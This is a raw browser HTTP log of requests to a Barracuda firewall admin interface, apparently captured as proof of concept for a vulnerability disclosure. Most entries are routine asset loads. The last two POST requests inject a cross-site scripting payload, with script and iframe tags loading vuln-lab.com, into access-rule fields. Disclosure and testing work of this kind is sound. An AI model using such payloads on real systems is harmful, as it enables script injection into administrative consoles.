Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi?auth_type=Local&et=1380588902&locale=en_US&password=71451090af206aab97066548cfa37766&user=guest&primary_tab=FIREWALL]
2:35:11.284[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/js/utils.js?v=6.1.0.016 Load Flags[LOAD_NORMAL] Content Size[unknown] Mime Type[unknown]
Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[*/*]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi?auth_type=Local&et=1380588902&locale=en_US&password=71451090af206aab97066548cfa37766&user=guest&primary_tab=FIREWALL]
2:35:11.284[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/js/adapters/prototype-adapter.js?v=6.1.0.016 Load Flags[LOAD_NORMAL] Content Size[unknown] Mime Type[unknown]
Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[*/*]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi?auth_type=Local&et=1380588902&locale=en_US&password=71451090af206aab97066548cfa37766&user=guest&primary_tab=FIREWALL]
2:35:11.285[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/js/highcharts.js?v=6.1.0.016 Load Flags[LOAD_NORMAL] Content Size[unknown] Mime Type[unknown]
Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[*/*]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi?auth_type=Local&et=1380588902&locale=en_US&password=71451090af206aab97066548cfa37766&user=guest&primary_tab=FIREWALL]
2:35:11.311[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/favicon.ico Load Flags[LOAD_NORMAL] Content Size[unknown] Mime Type[unknown]
Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
2:35:11.368[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/favicon.ico Load Flags[LOAD_NORMAL] Content Size[unknown] Mime Type[unknown]
Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
2:35:11.410[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/js/scriptaculous/effects.js Load Flags[LOAD_NORMAL] Content Size[unknown] Mime Type[unknown]
Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[*/*]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi?auth_type=Local&et=1380588902&locale=en_US&password=71451090af206aab97066548cfa37766&user=guest&primary_tab=FIREWALL]
2:35:11.411[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/js/scriptaculous/dragdrop.js Load Flags[LOAD_NORMAL] Content Size[unknown] Mime Type[unknown]
Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[*/*]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi?auth_type=Local&et=1380588902&locale=en_US&password=71451090af206aab97066548cfa37766&user=guest&primary_tab=FIREWALL]
2:35:11.633[1989ms][total 1989ms] Status: 200[OK]
GET https://firewall.ptest.cudasvc.com/cgi-mod/header_logo.cgi?6.1.0.016 Load Flags[LOAD_NORMAL] Content Size[-1] Mime Type[image/png]
Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[image/png,image/*;q=0.8,*/*;q=0.5]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi?auth_type=Local&et=1380588902&locale=en_US&password=71451090af206aab97066548cfa37766&user=guest&primary_tab=FIREWALL]
Connection[keep-alive]
Response Headers:
Server[BarracudaFirewallHTTP 4.0]
Content-Type[image/png]
Transfer-Encoding[chunked]
Connection[keep-alive]
Expires[Tue, 01 Oct 2013 00:35:14 GMT]
Date[Tue, 01 Oct 2013 00:35:14 GMT]
Cache-Control[no-cache, no-store]
2:35:12.070[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/images/edit.png Load Flags[LOAD_NORMAL] Content Size[unknown] Mime Type[unknown]
Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[image/png,image/*;q=0.8,*/*;q=0.5]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi?auth_type=Local&et=1380588902&locale=en_US&password=71451090af206aab97066548cfa37766&user=guest&primary_tab=FIREWALL]
2:35:12.071[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/images/del.png Load Flags[LOAD_NORMAL] Content Size[unknown] Mime Type[unknown]
Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[image/png,image/*;q=0.8,*/*;q=0.5]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi?auth_type=Local&et=1380588902&locale=en_US&password=71451090af206aab97066548cfa37766&user=guest&primary_tab=FIREWALL]
2:35:12.071[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/images/clone.png Load Flags[LOAD_NORMAL] Content Size[unknown] Mime Type[unknown]
Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[image/png,image/*;q=0.8,*/*;q=0.5]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi?auth_type=Local&et=1380588902&locale=en_US&password=71451090af206aab97066548cfa37766&user=guest&primary_tab=FIREWALL]
2:35:12.072[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/images/bfw/serviceredirect.png Load Flags[LOAD_NORMAL] Content Size[unknown] Mime Type[unknown]
Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[image/png,image/*;q=0.8,*/*;q=0.5]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi?auth_type=Local&et=1380588902&locale=en_US&password=71451090af206aab97066548cfa37766&user=guest&primary_tab=FIREWALL]
2:35:12.072[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/images/red.png Load Flags[LOAD_NORMAL] Content Size[unknown] Mime Type[unknown]
Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[image/png,image/*;q=0.8,*/*;q=0.5]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi?auth_type=Local&et=1380588902&locale=en_US&password=71451090af206aab97066548cfa37766&user=guest&primary_tab=FIREWALL]
2:35:20.198[1858ms][total 2743ms] Status: 200[OK]
GET https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi?password=38094a91aaca441b13c61e5740b49695&et=1380588910&primary_tab=FIREWALL&new_secondary_tab=firewall_access_rules&auth_type=Local&update_type=add&locale=en_US&secondary_tab=add_access_rule&content_only=1&user=guest&backup_life=0&ispopup=1&parent_name=firewall_access_rules&popup_width=700&popup_height=850 Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Content Size[-1] Mime Type[text/html]
Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi?auth_type=Local&et=1380588902&locale=en_US&password=71451090af206aab97066548cfa37766&user=guest&primary_tab=FIREWALL]
Connection[keep-alive]
Response Headers:
Server[BarracudaFirewallHTTP 4.0]
Content-Type[text/html; charset=utf-8]
Transfer-Encoding[chunked]
Connection[keep-alive]
Expires[Mon, 01 Oct 2012 00:35:22 GMT]
Date[Tue, 01 Oct 2013 00:35:22 GMT]
2:35:20.376[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/images/default/grid/row-over.gif Load Flags[LOAD_NORMAL] Content Size[unknown] Mime Type[unknown]
Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[image/png,image/*;q=0.8,*/*;q=0.5]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/css/ext-all.css?v=6.1.0.016]
2:35:22.084[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/js/prototype.js?v=6.1.0.016 Load Flags[LOAD_NORMAL] Content Size[unknown] Mime Type[unknown]
Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[*/*]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi?password=38094a91aaca441b13c61e5740b49695&et=1380588910&primary_tab=FIREWALL&new_secondary_tab=firewall_access_rules&auth_type=Local&update_type=add&locale=en_US&secondary_tab=add_access_rule&content_only=1&user=guest&backup_life=0&ispopup=1&parent_name=firewall_access_rules&popup_width=700&popup_height=850]
2:35:22.085[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/js/scriptaculous/scriptaculous.js?load=effects,dragdrop&v=6.1.0.016 Load Flags[LOAD_NORMAL] Content Size[unknown] Mime Type[unknown]
Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[*/*]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi?password=38094a91aaca441b13c61e5740b49695&et=1380588910&primary_tab=FIREWALL&new_secondary_tab=firewall_access_rules&auth_type=Local&update_type=add&locale=en_US&secondary_tab=add_access_rule&content_only=1&user=guest&backup_life=0&ispopup=1&parent_name=firewall_access_rules&popup_width=700&popup_height=850]
2:35:22.086[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/js/ext-prototype-adapter.js?v=6.1.0.016 Load Flags[LOAD_NORMAL] Content Size[unknown] Mime Type[unknown]
Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[*/*]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi?password=38094a91aaca441b13c61e5740b49695&et=1380588910&primary_tab=FIREWALL&new_secondary_tab=firewall_access_rules&auth_type=Local&update_type=add&locale=en_US&secondary_tab=add_access_rule&content_only=1&user=guest&backup_life=0&ispopup=1&parent_name=firewall_access_rules&popup_width=700&popup_height=850]
2:35:22.087[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/js/ext-all.js?v=6.1.0.016 Load Flags[LOAD_NORMAL] Content Size[unknown] Mime Type[unknown]
Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[*/*]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi?password=38094a91aaca441b13c61e5740b49695&et=1380588910&primary_tab=FIREWALL&new_secondary_tab=firewall_access_rules&auth_type=Local&update_type=add&locale=en_US&secondary_tab=add_access_rule&content_only=1&user=guest&backup_life=0&ispopup=1&parent_name=firewall_access_rules&popup_width=700&popup_height=850]
2:35:22.088[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/js_functions.js?v=6.1.0.016 Load Flags[LOAD_NORMAL] Content Size[unknown] Mime Type[unknown]
Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[*/*]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi?password=38094a91aaca441b13c61e5740b49695&et=1380588910&primary_tab=FIREWALL&new_secondary_tab=firewall_access_rules&auth_type=Local&update_type=add&locale=en_US&secondary_tab=add_access_rule&content_only=1&user=guest&backup_life=0&ispopup=1&parent_name=firewall_access_rules&popup_width=700&popup_height=850]
2:35:22.089[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/js/ext-ux.js?v=6.1.0.016 Load Flags[LOAD_NORMAL] Content Size[unknown] Mime Type[unknown]
Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[*/*]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi?password=38094a91aaca441b13c61e5740b49695&et=1380588910&primary_tab=FIREWALL&new_secondary_tab=firewall_access_rules&auth_type=Local&update_type=add&locale=en_US&secondary_tab=add_access_rule&content_only=1&user=guest&backup_life=0&ispopup=1&parent_name=firewall_access_rules&popup_width=700&popup_height=850]
2:35:22.090[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/js/prototype.helper.js?v=6.1.0.016 Load Flags[LOAD_NORMAL] Content Size[unknown] Mime Type[unknown]
Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[*/*]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi?password=38094a91aaca441b13c61e5740b49695&et=1380588910&primary_tab=FIREWALL&new_secondary_tab=firewall_access_rules&auth_type=Local&update_type=add&locale=en_US&secondary_tab=add_access_rule&content_only=1&user=guest&backup_life=0&ispopup=1&parent_name=firewall_access_rules&popup_width=700&popup_height=850]
2:35:22.090[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/js/prototype.ajaxvalidation.js?v=6.1.0.016 Load Flags[LOAD_NORMAL] Content Size[unknown] Mime Type[unknown]
Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[*/*]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi?password=38094a91aaca441b13c61e5740b49695&et=1380588910&primary_tab=FIREWALL&new_secondary_tab=firewall_access_rules&auth_type=Local&update_type=add&locale=en_US&secondary_tab=add_access_rule&content_only=1&user=guest&backup_life=0&ispopup=1&parent_name=firewall_access_rules&popup_width=700&popup_height=850]
2:35:22.092[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/js/utils.js?v=6.1.0.016 Load Flags[LOAD_NORMAL] Content Size[unknown] Mime Type[unknown]
Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[*/*]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi?password=38094a91aaca441b13c61e5740b49695&et=1380588910&primary_tab=FIREWALL&new_secondary_tab=firewall_access_rules&auth_type=Local&update_type=add&locale=en_US&secondary_tab=add_access_rule&content_only=1&user=guest&backup_life=0&ispopup=1&parent_name=firewall_access_rules&popup_width=700&popup_height=850]
2:35:22.093[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/js/adapters/prototype-adapter.js?v=6.1.0.016 Load Flags[LOAD_NORMAL] Content Size[unknown] Mime Type[unknown]
Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[*/*]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi?password=38094a91aaca441b13c61e5740b49695&et=1380588910&primary_tab=FIREWALL&new_secondary_tab=firewall_access_rules&auth_type=Local&update_type=add&locale=en_US&secondary_tab=add_access_rule&content_only=1&user=guest&backup_life=0&ispopup=1&parent_name=firewall_access_rules&popup_width=700&popup_height=850]
2:35:22.094[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/js/highcharts.js?v=6.1.0.016 Load Flags[LOAD_NORMAL] Content Size[unknown] Mime Type[unknown]
Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[*/*]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi?password=38094a91aaca441b13c61e5740b49695&et=1380588910&primary_tab=FIREWALL&new_secondary_tab=firewall_access_rules&auth_type=Local&update_type=add&locale=en_US&secondary_tab=add_access_rule&content_only=1&user=guest&backup_life=0&ispopup=1&parent_name=firewall_access_rules&popup_width=700&popup_height=850]
2:35:22.094[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/barracuda.css?v=6.1.0.016 Load Flags[LOAD_NORMAL] Content Size[unknown] Mime Type[unknown]
Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[text/css,*/*;q=0.1]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi?password=38094a91aaca441b13c61e5740b49695&et=1380588910&primary_tab=FIREWALL&new_secondary_tab=firewall_access_rules&auth_type=Local&update_type=add&locale=en_US&secondary_tab=add_access_rule&content_only=1&user=guest&backup_life=0&ispopup=1&parent_name=firewall_access_rules&popup_width=700&popup_height=850]
2:35:22.095[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/css/ext-all.css?v=6.1.0.016 Load Flags[LOAD_NORMAL] Content Size[unknown] Mime Type[unknown]
Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[text/css,*/*;q=0.1]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi?password=38094a91aaca441b13c61e5740b49695&et=1380588910&primary_tab=FIREWALL&new_secondary_tab=firewall_access_rules&auth_type=Local&update_type=add&locale=en_US&secondary_tab=add_access_rule&content_only=1&user=guest&backup_life=0&ispopup=1&parent_name=firewall_access_rules&popup_width=700&popup_height=850]
2:35:22.096[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/css/ext-ux.css?v=6.1.0.016 Load Flags[LOAD_NORMAL] Content Size[unknown] Mime Type[unknown]
Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[text/css,*/*;q=0.1]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi?password=38094a91aaca441b13c61e5740b49695&et=1380588910&primary_tab=FIREWALL&new_secondary_tab=firewall_access_rules&auth_type=Local&update_type=add&locale=en_US&secondary_tab=add_access_rule&content_only=1&user=guest&backup_life=0&ispopup=1&parent_name=firewall_access_rules&popup_width=700&popup_height=850]
2:35:22.096[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/css/bfw.css?v=6.1.0.016 Load Flags[LOAD_NORMAL] Content Size[unknown] Mime Type[unknown]
Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[text/css,*/*;q=0.1]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi?password=38094a91aaca441b13c61e5740b49695&et=1380588910&primary_tab=FIREWALL&new_secondary_tab=firewall_access_rules&auth_type=Local&update_type=add&locale=en_US&secondary_tab=add_access_rule&content_only=1&user=guest&backup_life=0&ispopup=1&parent_name=firewall_access_rules&popup_width=700&popup_height=850]
2:35:22.189[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/js/scriptaculous/effects.js Load Flags[LOAD_NORMAL] Content Size[unknown] Mime Type[unknown]
Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[*/*]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi?password=38094a91aaca441b13c61e5740b49695&et=1380588910&primary_tab=FIREWALL&new_secondary_tab=firewall_access_rules&auth_type=Local&update_type=add&locale=en_US&secondary_tab=add_access_rule&content_only=1&user=guest&backup_life=0&ispopup=1&parent_name=firewall_access_rules&popup_width=700&popup_height=850]
2:35:22.190[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/js/scriptaculous/dragdrop.js Load Flags[LOAD_NORMAL] Content Size[unknown] Mime Type[unknown]
Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[*/*]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi?password=38094a91aaca441b13c61e5740b49695&et=1380588910&primary_tab=FIREWALL&new_secondary_tab=firewall_access_rules&auth_type=Local&update_type=add&locale=en_US&secondary_tab=add_access_rule&content_only=1&user=guest&backup_life=0&ispopup=1&parent_name=firewall_access_rules&popup_width=700&popup_height=850]
2:35:22.387[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/favicon.ico Load Flags[LOAD_NORMAL] Content Size[unknown] Mime Type[unknown]
Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
2:35:22.387[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/favicon.ico Load Flags[LOAD_NORMAL] Content Size[unknown] Mime Type[unknown]
Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
2:35:38.671[841ms][total 841ms] Status: 200[OK]
POST https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi Load Flags[LOAD_BYPASS_CACHE LOAD_BACKGROUND ] Content Size[-1] Mime Type[text/plain]
Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[text/javascript, text/html, application/xml, text/xml, */*]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
X-Requested-With[XMLHttpRequest]
X-Prototype-Version[1.7]
Content-Type[application/x-www-form-urlencoded; charset=UTF-8]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi?password=38094a91aaca441b13c61e5740b49695&et=1380588910&primary_tab=FIREWALL&new_secondary_tab=firewall_access_rules&auth_type=Local&update_type=add&locale=en_US&secondary_tab=add_access_rule&content_only=1&user=guest&backup_life=0&ispopup=1&parent_name=firewall_access_rules&popup_width=700&popup_height=850]
Content-Length[339]
Connection[keep-alive]
Pragma[no-cache]
Cache-Control[no-cache]
Post Data:
ajax_action[check_param_ajax_single]
name[UPDATE_fw_access_rule_src_inc_single]
value['%22%3E%3E%22%3Cscript%3Eprompt(1337)%3C%2Fscript%3E%20%3E%22%3Ciframe%20onload%3Dprompt(7331)%20src%3Dhttp%3A%2F%2Fvuln-lab.com%20%3C%2Fiframe%3E%20%3C]
user[guest]
password[11b4e698d80c20f443854d6eb442c17c]
et[1380588921]
locale[en_US]
auth_type[Local]
realm[]
Response Headers:
Server[BarracudaFirewallHTTP 4.0]
Date[Tue, 01 Oct 2013 00:35:40 GMT]
Content-Type[text/plain; charset=utf-8]
Transfer-Encoding[chunked]
Connection[keep-alive]
2:35:50.213[300ms][total 300ms] Status: 200[OK]
POST https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi Load Flags[LOAD_BYPASS_CACHE LOAD_BACKGROUND ] Content Size[-1] Mime Type[text/plain]
Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[text/javascript, text/html, application/xml, text/xml, */*]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
X-Requested-With[XMLHttpRequest]
X-Prototype-Version[1.7]
Content-Type[application/x-www-form-urlencoded; charset=UTF-8]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi?password=38094a91aaca441b13c61e5740b49695&et=1380588910&primary_tab=FIREWALL&new_secondary_tab=firewall_access_rules&auth_type=Local&update_type=add&locale=en_US&secondary_tab=add_access_rule&content_only=1&user=guest&backup_life=0&ispopup=1&parent_name=firewall_access_rules&popup_width=700&popup_height=850]
Content-Length[339]
Connection[keep-alive]
Pragma[no-cache]
Cache-Control[no-cache]
Post Data:
ajax_action[check_param_ajax_single]
name[UPDATE_fw_access_rule_dst_inc_single]
value['%22%3E%3E%22%3Cscript%3Eprompt(1337)%3C%2Fscript%3E%20%3E%22%3Ciframe%20onload%3Dprompt(7331)%20src%3Dhttp%3A%2F%2Fvuln-lab.com%20%3C%2Fiframe%3E%20%3C]
user[guest]
password[11b4e698d80c20f443854d6eb442c17c]
et[1380588921]
locale[en_US]
auth_type[Local]
realm[]
Response Headers:
Server[BarracudaFirewallHTTP 4.0]
